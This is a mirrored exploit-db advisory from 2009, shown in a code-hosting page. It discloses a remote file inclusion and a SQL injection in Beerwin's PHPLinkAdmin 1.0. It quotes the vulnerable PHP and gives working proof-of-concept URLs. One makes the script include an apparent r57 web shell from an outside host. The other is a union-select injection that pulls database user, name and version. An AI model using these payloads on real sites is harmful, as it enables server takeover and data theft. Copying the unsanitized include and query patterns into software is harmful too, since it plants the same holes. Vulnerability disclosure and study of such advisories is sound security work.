bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8216.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

60 lines
No EOL
2 KiB
Text
Raw Blame History

#######################################################################################################################
[+] Beerwin's PHPLinkAdmin 1.0 Remote File Inclusion/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#######################################################################################################################
[+] Download : http://www.downloads.beerwin.com/index.php?p=showdl&dl=16&cat=18
[+] Remote File Inclusion
Direct acces to linkadmin.No auth.
Vulnerable code in linkadmin.php :
-------------------------------------------------------------------------------------------
$page = $_REQUEST['page'];
if (!$page){
echo "Welcome to the PHPLINKADMIN!.<br> Please select an action from
the left menu.";
}else{
include $page;
}
--------------------------------------------------------------------------------------------
PoC :
http://127.0.0.1/path/linkadmin.php?page=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt?
========================================================================================================================
[+] Remote SQL Injection
Is a lot of SQL Injection vulnerabilities in the script.I will
present only one.
Vulnerable code in edlink.php :
-----------------------------------------------------------------------------------------------
$linkid=$_REQUEST['linkid'];
if (!$linkid){
echo "Error: Link missing! <br />";
}else{
$sql=mysql_query("SELECT * FROM linktable WHERE linkid='$linkid'")
or die(mysql_error());
-----------------------------------------------------------------------------------------------
PoC :
http://127.0.0.1/path/edlink.php?linkid=-1' union all select
1,2,3,4,concat_ws(0x3a,user(),database(),version())'--
No important things to extract from database.
=========================================================================================================================
#######################################################################################################################
# milw0rm.com [2009-03-16]
Reference in a new issue View git blame Copy permalink